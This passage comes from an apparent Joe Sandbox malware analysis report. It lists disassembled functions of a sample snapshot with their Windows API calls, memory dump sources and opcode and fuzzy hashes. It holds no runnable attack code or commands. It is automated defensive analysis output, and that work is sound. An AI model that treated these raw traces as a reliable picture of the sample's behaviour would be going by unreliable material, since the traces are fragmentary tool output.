                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020D169
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020D18F
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020D1A2
                                                                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020D1B1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6014fb102f2b9eac608861677f23dd619dac8400cc1c348556e9c38591a1b10f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2a9ec21caa96571d8ac5a9dc7ade068512caff746d07fddb9e29f1e40c3ae9de
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6014fb102f2b9eac608861677f23dd619dac8400cc1c348556e9c38591a1b10f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE01DD76B227157FB3216AFA5C4CC7BFA6DDEC2B613140119FC08C2281DEA08C1185B0
                                                                                                                                                                                                                                                                                                                            Function 0020316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,001FF64E,001F545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00203170
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002031A5
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002031CC
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002031D9
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002031E2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0ac9fa2961d8b9aece0b0d90926817aaf31e7ca5b0db47ac04045cab07e854c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 525941ebce4540e6a232936756ba6f07f725dcf7c8a3e096636d9cd9c6fe4302
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0ac9fa2961d8b9aece0b0d90926817aaf31e7ca5b0db47ac04045cab07e854c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401D672674B016BD712AA34AC8DD2A555D9FC93717200425F91D922D3EEA18A355920
                                                                                                                                                                                                                                                                                                                            Function 002308FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?,?,00230C4E), ref: 0023091B
                                                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230936
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230944
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?), ref: 00230954
                                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230960
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8f2d8ddfcbd9796f61704810aba4320c390c73717f5a24b1596648932bd8d204
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8f7aba39a42d3760f95f286e07b69e910351828a5be22f7324406e63b248cffe
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f2d8ddfcbd9796f61704810aba4320c390c73717f5a24b1596648932bd8d204
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61018FB2B10219AFEB104F95EC88B9A7AADEB84B61F144124F905E3212D7B1DD519BB0
                                                                                                                                                                                                                                                                                                                            Function 0023F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0023F2AE
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0023F2BC
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0023F2C4
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0023F2CE
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c0e497d76356e4cc7439393c085ec1e9b3981928f74922b32cb598e3ee92c753
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8e6d8ace6c2eae9b5f15889b488f39c32d12bb0dfc21e4fe685f35320203f0cb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0e497d76356e4cc7439393c085ec1e9b3981928f74922b32cb598e3ee92c753
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3016DB1D1161EDBDF00AFA5FD4DAEEBB78FB09700F0144A6E902B2250DBB09564C7A1
                                                                                                                                                                                                                                                                                                                            Function 00231A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8cc4d227ceec54f908a6dc2f87c9e3a53303857560aed4c179b8d31c20db9e2c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dc47a375eb2610552c4b0374b76e71fa49e351e2ba1a6aa29ce77eb3ef6dfefb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cc4d227ceec54f908a6dc2f87c9e3a53303857560aed4c179b8d31c20db9e2c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E20181B5A0120ABFDB114F65EC4CD6A3B6EEF89365F214454F845C3260DAB1DC50CA60
                                                                                                                                                                                                                                                                                                                            Function 00231900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00231916
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00231922
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00231931
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00231938
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023194E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 175159a7fdcd6759e05087f753fa52e8fe9ad720e66cab1825231504ab8d8cba
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f9b429e0de46aec08478040701d65467179c9dcc9a7fede48d3453c88a4aaf7e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 175159a7fdcd6759e05087f753fa52e8fe9ad720e66cab1825231504ab8d8cba
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0967560031ABBDB210F65EC5DF573B6DEF897A0F114454FA45D7250CAB1DC20CA60
                                                                                                                                                                                                                                                                                                                            Function 00231960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00231976
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00231982
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00231991
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00231998
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002319AE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8eaf06d3e971dccfb702b53965906a2bc236660b7ab66568fc0bf06dae538d9e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c351b740b4e604fe85f4dc94d1234feb458635976bb03c3e5bdbc726802b1a3d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eaf06d3e971dccfb702b53965906a2bc236660b7ab66568fc0bf06dae538d9e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90F06275600315BBDB214F65EC5DF563B6DEF897A0F118454F945C7250CAB1D8208A60
                                                                                                                                                                                                                                                                                                                            Function 00240CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CCB
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CD8
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CE5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CF2
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CFF
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240D0C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c5d4c3bd19dd1788761f255e13ea425f5844727d6f13b66dc4dc19e2cc67f848
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8ddc7cc5a32a5a9fa0a660e71b69eb1d16c3f52d6eb3a06ecf298402b85c5235
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5d4c3bd19dd1788761f255e13ea425f5844727d6f13b66dc4dc19e2cc67f848
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A019C71810B16DFCB34AFA6D9C0816FAF9BE502153158A3FD29652921C7B0A9A8DE80
                                                                                                                                                                                                                                                                                                                            Function 002365AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002365BF
                                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 002365D6
                                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 002365EE
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 0023660A
                                                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00236624
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3171fece9df0d0f6e71a350b16817ec8418d4adbb4fa190c56562b1e2caaba5a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 401ce139aacb9f0c70b8de016637233945956ecabae97788b1407a3e9a40d9be
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3171fece9df0d0f6e71a350b16817ec8418d4adbb4fa190c56562b1e2caaba5a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0018670A10709BBEB215F10FD4EB967B7CFB14705F008569E186610E1DBF4AA648E50
                                                                                                                                                                                                                                                                                                                            Function 0020DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020DAD2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020DAE4
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020DAF6
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020DB08
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020DB1A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 754b349334ed66ec6c75b7fc48ae0df79fbd3a8b211fda0d416554be79c8ef06
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 59562f0cf939fcf90a4213feba49ea0e2633182cf1cb2371b6df746e22e00f45
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 754b349334ed66ec6c75b7fc48ae0df79fbd3a8b211fda0d416554be79c8ef06
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AF0FF32565305ABC724EFA8FAC9D1A77DDBE047107950C06F049D7583CA20FC909A94
                                                                                                                                                                                                                                                                                                                            Function 00202610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020262E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
